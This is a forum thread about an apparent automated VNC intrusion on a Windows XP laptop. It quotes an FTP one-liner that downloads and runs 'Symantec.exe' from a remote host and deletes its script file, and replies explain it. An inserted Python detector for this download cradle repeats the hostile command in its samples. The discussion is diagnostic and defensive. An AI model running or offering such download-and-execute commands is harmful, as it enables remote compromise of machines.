
possible virus / remote access ??

  • 30-12-2006 8:57pm
    #1
    Registered Users, Registered Users 2 Posts: 3,842 ✭✭✭


    Folks,

    Strange things started happening on the laptop this afternoon (WinXP Pro with SP2 and fully updated OS running McAfee)

    First off the run box popped up and this was entered...

    Start > Run > %systemroot%\system32\cmd.exe

    Then at the cmd prompt, this was entered...

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>cho open 10.0.1.15 15203 >> aa &echo user a a >> aa &echo bi
    nary >> aa &echo get Symantec.exe >> aa &echo bye >> aa &ftp -n -v -s:aa &del aa
    &Symantec.exe
    'cho' is not recognized as an internal or external command,
    operable program or batch file.
    ftp> user a a
    Not connected.
    ftp> binary
    Not connected.
    ftp> get Symantec.exe
    Not connected.
    ftp> bye
    'Symantec.exe' is not recognized as an internal or external command,
    operable program or batch file.

    C:\WINDOWS\system32>


    All the while VNC was running in the systray and seemed active (I've since deleted VNC).
    Was this a remote access attack (and if so how and why?) or a virus / worm??


Comments

  • Registered Users, Registered Users 2 Posts: 11,987 ✭✭✭✭zAbbo


    Hmm, not sure what that was. Have you opened VNC without running it through SSH on your router?

    Could be a Symantec update script?


  • Moderators, Recreation & Hobbies Moderators, Science, Health & Environment Moderators, Technology & Internet Moderators Posts: 92,394 Mod ✭✭✭✭Capt'n Midnight


    What firewall are you using?

    Check in Scheduled Tasks in Control Panel to see what's supposed to run.

    cho is a command - search for cho.* to see if it's on your system.

    It looks like it's trying to download symantec.exe from a server on 10.0.1.15.
    If it's a corporate PC, is this a server on your LAN?



    Was the VNC icon white (no connection) or black (a connection)?


  • Registered Users, Registered Users 2 Posts: 5,335 ✭✭✭Cake Fiend


    The command is 'echo', only the 'e' got cut off for some reason. Whoever did this echoed ftp commands into a file ('aa'), ran the ftp command to connect to that address on port 15203 (non-standard port, looks dodgy to me) to download this 'symantec.exe' file, then deleted the 'aa' file to cover its tracks, then tried to run the 'symantec.exe' file that should have just been downloaded.

    An automatic script (e.g. scheduled task) most likely wouldn't have used the 'run' box. You say that cmd.exe was run from the run box, then all the ftp stuff was entered into the new command box - did you see this happen in real time? Or did you come along and notice that the command box was open with all this stuff in it?

    Probably an attack through your VNC server. Check out your version of VNC and see if there are any known exploits for that version and release number. Seems odd to me that someone would do this and then leave a) the command box open and b) the 'run' history there, did you cut them off in the middle of the attack?


  • Registered Users, Registered Users 2 Posts: 3,842 ✭✭✭s8n


    Thanks for the feedback so far folks, as I said I'm stumped on this....

    The attack happened twice in real time before my eyes.
    VNC was black so it was in use. It's a company PC, but was NOT connected via VPN to the corporate LAN.
    Also Sophos is not in use on the router.

    I've since uninstalled VNC and it hasn't happened, but I'd just like to know why it happened and what they were hoping to achieve.


  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    The fact that it continually tried to issue ftp commands despite not being connected is what makes me suspect it was some sort of batch file.

    There's also the address 10.0.1.15. This is an internal private address. So unless the attacker knew the layout of your internal network, and had somehow uploaded their malicious file to a machine on this network (or had somehow connected your machine to a VPN).

    Very weird.


  • Closed Accounts Posts: 2,669 ✭✭✭mukki


    That's the VNC password bypass bug; just install the newer one. It was a fully automated attack.


  • Registered Users, Registered Users 2 Posts: 5,335 ✭✭✭Cake Fiend


    seamus wrote:
    The fact that it continually tried to issue ftp commands despite not being connected is what makes me suspect it was some sort of batch file.

    This was caused by what was echoed into the file 'aa'. You can pass the ftp command a text file of commands, which it will execute in sequence. The FTP commands this person tried to issue were:

    open 10.0.1.15 15203
    user a a
    binary
    get Symantec.exe
    bye

    As in connect to this IP and port, download this file, then exit the ftp. Of course, since the first 'echo' command bolloxed up, the list of commands wasn't complete (it missed out the 'open' command). If this had been typed properly, the 'Symantec.exe' file would have been downloaded and executed, and the list of ftp commands (file 'aa') was deleted.

    As mukki mentioned, there's a well-known password bug with VNC which is most likely what was used to get into your machine. Check the notes on the version you were using for details.

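The FTP script-file technique Cake Fiend walks through above (and the one-liner quoted in the original post) has a very recognisable shape in process-creation logs: a chain of `echo ... >> file` segments, an `ftp -s:file` call, a `del` of the script, and then the fetched filename run as a command. The block below is an added example, not code from the thread or from any tool named in it: a small Python analyser that splits a command line on `&`, reconstructs the script file that was assembled with `echo`, and reports why the line looks like a download cradle. The sample command lines are constructed for the example (the first two are modelled on the thread's one-liner, once as the attacker intended it and once as it actually ran with the leading `e` missing), and `analyze`, `Finding` and `scan` are names of my choosing.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample process command lines; none of these are real telemetry.
SAMPLE_CMDLINES = [
    # The thread's one-liner with the missing 'e' restored (as the attacker intended).
    'cmd.exe /c echo open 10.0.1.15 15203 >> aa &echo user a a >> aa &echo binary >> aa '
    '&echo get Symantec.exe >> aa &echo bye >> aa &ftp -n -v -s:aa &del aa &Symantec.exe',
    # The same line as it actually ran: 'cho' is not a command, so no 'open' line was written.
    'cmd.exe /c cho open 10.0.1.15 15203 >> aa &echo user a a >> aa &echo binary >> aa '
    '&echo get Symantec.exe >> aa &echo bye >> aa &ftp -n -v -s:aa &del aa &Symantec.exe',
    # Benign use of a script file: pre-existing script, default port, nothing executed after.
    'cmd.exe /c ftp -n -s:C:\\scripts\\backup.ftp ftp.example.internal',
    # Benign echo into a file with no ftp involvement at all.
    'cmd.exe /c echo done >> C:\\logs\\job.log',
]

CMD_PREFIX_RE = re.compile(r'^\s*\S*cmd(?:\.exe)?\s+/[ck]\s+', re.I)   # strip "cmd.exe /c "
ECHO_RE = re.compile(r'^\s*echo\s+(.*?)\s*>>?\s*(\S+)\s*$', re.I)     # echo <text> >> <file>
FTP_RE = re.compile(r'^\s*ftp(?:\.exe)?\b(.*)$', re.I)                 # ftp <args>
SCRIPT_FLAG_RE = re.compile(r'-s:(\S+)', re.I)                         # -s:<scriptfile>


@dataclass
class Finding:
    script_file: Optional[str] = None          # file handed to ftp -s:
    script_lines: list = field(default_factory=list)  # lines reconstructed from echo segments
    open_target: Optional[tuple] = None        # (host, port) from an 'open' line, if any
    fetched: list = field(default_factory=list)        # filenames requested with get/recv
    executed_fetched: list = field(default_factory=list)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def analyze(cmdline: str) -> Finding:
    """Reconstruct an inline-built ftp script from one command line and judge it."""
    segments = [s for s in re.split(r'\s*&{1,2}\s*', cmdline) if s]
    if segments:
        segments[0] = CMD_PREFIX_RE.sub('', segments[0])

    scripts: dict = {}       # target file -> lines appended to it via echo
    finding = Finding()
    ftp_index = None
    for i, seg in enumerate(segments):
        m = ECHO_RE.match(seg)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_RE.match(seg)
        if m:
            s = SCRIPT_FLAG_RE.search(m.group(1))
            if s:
                finding.script_file, ftp_index = s.group(1).lower(), i
    if finding.script_file is None:
        return finding                          # no scripted ftp call: nothing to assess

    finding.script_lines = scripts.get(finding.script_file, [])
    for line in finding.script_lines:
        parts = line.split()
        verb = parts[0].lower() if parts else ''
        if verb == 'open' and len(parts) >= 2:
            port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
            finding.open_target = (parts[1], port)
        elif verb in ('get', 'recv', 'mget') and len(parts) >= 2:
            finding.fetched.append(parts[1])

    if finding.script_lines:
        finding.reasons.append('ftp script file was assembled inline with echo')
    if finding.open_target and finding.open_target[1] != 21:
        finding.reasons.append(f'ftp to non-standard port {finding.open_target[1]}')

    fetched_lower = {f.lower() for f in finding.fetched}
    for seg in segments[ftp_index + 1:]:
        tokens = seg.split()
        if not tokens:
            continue
        if tokens[0].lower() in ('del', 'erase') and finding.script_file in seg.lower():
            finding.reasons.append('script file deleted after use')
        elif tokens[0].lower() not in ('del', 'erase', 'echo'):
            finding.executed_fetched += [t for t in tokens if t.lower() in fetched_lower]
    if finding.executed_fetched:
        finding.reasons.append('downloaded file executed in the same command line')
    return finding


def scan(cmdlines) -> list:
    """Return (cmdline, finding) pairs for every line that looks like a download cradle."""
    return [(c, f) for c in cmdlines if (f := analyze(c)).suspicious]


if __name__ == '__main__':
    for cmdline, f in scan(SAMPLE_CMDLINES):
        print(cmdline[:60] + '...')
        for r in f.reasons:
            print('   -', r)
```

Note that the second sample, the botched line, still trips three of the four indicators even though the `open` line never made it into the script: the verdict rests on the structure of the command line, not on whether the transfer would have succeeded, which is the property a defender wants from a rule like this.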

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    You got hit by a self-spreading botnet using the VNC authbypass vulnerability in RealVNC v4.1.1. However, it looks like it was a script kiddy who configured it arse ways and it messed up on him. Chances are it was an infected PC that scanned your IP range, connected and tried to infect your PC. VNC botnets use automated VNC remote software; it's not someone doing this manually.

    Also 10.x.x.x is a LAN IP so I dunno what he was at!

